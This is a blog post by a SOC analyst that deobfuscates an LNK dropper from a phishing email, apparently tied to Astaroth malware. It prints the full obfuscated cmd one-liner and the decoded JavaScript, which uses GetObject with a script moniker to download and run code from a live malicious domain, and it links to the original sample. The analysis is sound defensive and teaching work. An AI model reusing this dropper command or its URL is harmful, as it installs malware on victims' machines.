Sitemap
Open in app

Sign in

Medium Logo
Write

Sign in

LNK Dropper — Malware Analysis

0xFF🪤 https://pwnyour.site
6 min readFeb 11, 2024

Recently, while working as a SOC Analyst at my company, I stumbled across a phishing mail containing a malicious URL whose purpose was to trick the victim into downloading a ZIP file containing a dropper that would eventually download the malware on the victim’s PC.

The LNK file is the first ring of a chain of malicious scripts and after further analysis made by a friend, it seems to be the dropper of the Astaroth malware.

At the time of writing this article I got to the 7th step of the Astaroth infection process provided by Talos, though I’m not 100% sure about its belonging to that malware campaign.

Before starting I need to make a premise. I have little experience in malware analysis, I’m learning while doing it, applying skills I’ve learned elsewhere. There’s for sure a simpler way to deobfuscate and analyze the payload I will present, this is my way. If you want to advise me some other way to do it, some tool or just discuss, please feel free to comment down below.

Also I would like to introduce a pair of concepts that I learned on the way while analyzing the malicious script.

Windows is capable to run scripts written in scripting languages like VBScript or JavaScript through Windows Script Host (WSH). You can compare it to a framework. Interaction with the Windows OS is possible thanks to Component Object Model (COM), providing a standard way for programs to interact and share functionality, similar to an API.

As stated before, the dropper is a LNK file. You can download the original ZIP file from this link after converting it from Hexdump format (just click the save icon).

Once downloaded the ZIP file, you will come up with an mp4 file, which is a base64 encoded payload and the LNK malicious file.

LNK properties

Payload extraction

Running UNIX strings command against it, I extracted the obfuscated command.

C:\Windows\System32\cONhosT.exe %COMSpeC% /V/D/c "S^eT SSG=C:\qoZG9P\&& mD !SSG!>nul 2>&1&&S^eT UFWN=!SSG!^PEBCPADO.JS&&<nul set/p LAXA=var LAXA='\u0055\u004c\u0064\u002b\u0044\u0055\u004c\u0064\u002b\u0045\u0055\u004c\u0064\u002b\u0022\u002f\u002f\u0074\u0034\u006f\u0061\u0070\u0066\u002e\u0063\u0068\u0075\u0063\u0072\u0075\u0074\u0065\u0064\u0061\u0064\u0069\u006c\u006d\u0061\u006f\u002e\u0063\u006c\u006f\u0075\u0064\u002f\u003f\u0032\u002f\u0022\u0029\u003b';SSG='\u003a\u0068\u0022\u003b\u0045\u0055\u004c\u0064\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043';PEBC='\u0076\u0061\u0072\u0020\u0043\u0055\u004c\u0064\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u0055\u004c\u0064\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022';UFWN=PEBC+SSG+LAXA;PADO=new Function(UFWN);PADO(); >!UFWN!|caLl !UFWN!||caLl !UFWN! "

A real mess right?

Analysis

To the batch-cave!

The first thing to do is convert unicode encoded characters to text. After conversion the complete LNK target looks like the following.

The first exe invoked is “C:\Windows\System32\cONhosT.exe”, properly mispelled to evade detection. Conhost stands for “Console Window Host” and is most commonly known as “cmd.exe”. So yes, it will open a command prompt window.

C:\Windows\System32\cONhosT.exe %COMSpeC% /V/D/c

What follows are arguments passed to conhost.exe.

The environment variable “%COMSpeC%” value is “C:\Windows\system32\cmd.exe” which is followed by some flags “/V”, “/D” and “/c” that respectively perform the following actions:

  • /V: This flag enables delayed environment variable expansion. When enabled, variables are expanded at execution time rather than at parse time.
  • /D: This flag sets the current directory of the new Command Prompt instance to the same directory as the calling process. Simply put, if the LNK reside in “C:\Users\Bob\Desktop\”, the new CMD session will start in the same directory.
  • /c: This flag specifies that the Command Prompt should execute the commands (in this case the payload) provided after it and then terminate.

Payload

The payload is what’s executed after spawning the command prompt.

To better understand the payload, I have broken it down into several stages.

S^eT SSG=C:\qoZG9P\

The variable SSG is set to the nonexistent (yet) path “C:\qoZG9P\”.

mD !SSG!>nul 2>&1

The malformed command “mD” is an alias to mkdir which will create a directory to the path specified in the previously created variable SSG. Any output will be redirected to nul (>nul). Finally 2>&1 is used to redirect the standard error (2) stream to the standard input (1) one. Maybe it has been done for debugging purposes and then left there.

S^eT UFWN=!SSG!^PEBCPADO.JS

The variable UFWN is set to the value of SSG plus a random string with JavaScript extension. UFWN value will then be “C:\qoZG9P\PEBCPADO.JS”.

<nul set/p LAXA=var LAXA='ULd+DULd+EULd+"//t4oapf.chucrutedadilmao.cloud/?2/");';
SSG=':h";EULd="Tt"+"P:";GetObject(C';PEBC='var CULd="s"+"cr";DULd="ipt"+"';
UFWN=PEBC+SSG+LAXA;
PADO=new Function(UFWN);
PADO();

This is where I initially got a bit tricked by the dropper, since I never coded in batch but in bash. Whenever you declare a variable without surrounding it with quotes in batch, everything coming after a space is not considered part of the variable value. Batch works differently, in fact everything you see after the first LAXA= is actually JavaScript code contained in the variable.

The leading <nul redirects input from the null device. In this case, it is used as a trick to suppress the need for user input.

set /p is a command used to set the value of an environment variable from input provided by the user. However, when paired with <nul, it allows to set the variable without any user input.

Payload inside the payload: JavaScript

It’s now time to see what the JavaScript code does, even if it’s pretty clear that we are dealing with a URL that will be called to download something nasty.

var LAXA='ULd+DULd+EULd+"//t4oapf.chucrutedadilmao.cloud/?2/");';
SSG=':h";EULd="Tt"+"P:";GetObject(C';
PEBC='var CULd="s"+"cr";DULd="ipt"+"';
UFWN=PEBC+SSG+LAXA;
PADO=new Function(UFWN);
PADO();

Three variables of the five defined variables (LAXA, SSG and UFWN) are defined with the same names of the Batch variables to confuse the analysts.

PEBC, SSG and LAXA contain further JavaScript code, in string format, responsible to download the malicious program that will infect the victim’s machine. Once declared, these 3 variables are reordered in the UFWN variable that will be passed as parameter to new Function(), stored in PADO and executed in the last line.

By solving the puzzle, the function contained in PADO will look like the following.

var CULd="s"+"cr";
DULd="ipt"+":h";
EULd="Tt"+"P:";
GetObject(CULd+DULd+EULd+"//t4oapf.chucrutedadilmao.cloud/?2/");
// script:hxxp[://]t4oapf[.]chucrutedadilmao[.]cloud/?2/

I still haven’t managed to find good documentation about the GetObject function but after digging a bit with an AI, turns out that GetObject is used to create an instance of a COM object based on its programmatic identifier (ProgID) or its moniker.

For example, the following JavaScript code retrieves a reference to the WSH Shell object, which permits to interact with the Windows shell.

var shell = GetObject("WScript.Shell");

Anyway, by looking at the parameter passed to the GetObject function in our case, which is a URL, it appears that the function can also create instances of COM objects retrieved from the web.

Back to Batch

Now that we have a better vision on the values of the variables, it’s time to see how the whole JavaScript code will be executed.

Do you remember the batch variable UFWN, containing the path to a JavaScript file? All the JS code we just saw is redirected to the variable, and so, written to the file.

>!UFWN!|caLl !UFWN!||caLl !UFWN!

After that, the script pointed by the variable UFWN is executed by call. The two call commands are separated by a double pipe. This means that if the first attempt to run the JavaScript file fails, the payload will try to run it again.

At the moment Kaspersky is the only vendor that recognize the URL found during the analysis as malicious.

Summary

In brief what the LNK dropper does is:

  • Spawn a Command Prompt session
  • Create a directory in C:\
  • Write JavaScript code that will download from a remote URL the malware with the COM GetObject function
  • Run the downloaded malware
Malware Analysis
Malware
JavaScript
Batch
Astaroth Malware

--

--

0xFF🪤 https://pwnyour.site
0xFF🪤 https://pwnyour.site

Written by 0xFF🪤 https://pwnyour.site

16 followers
13 following

I'm still publishing on Medium, but also on my blog https://pwnyour.site/

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Rules

Terms

Text to speech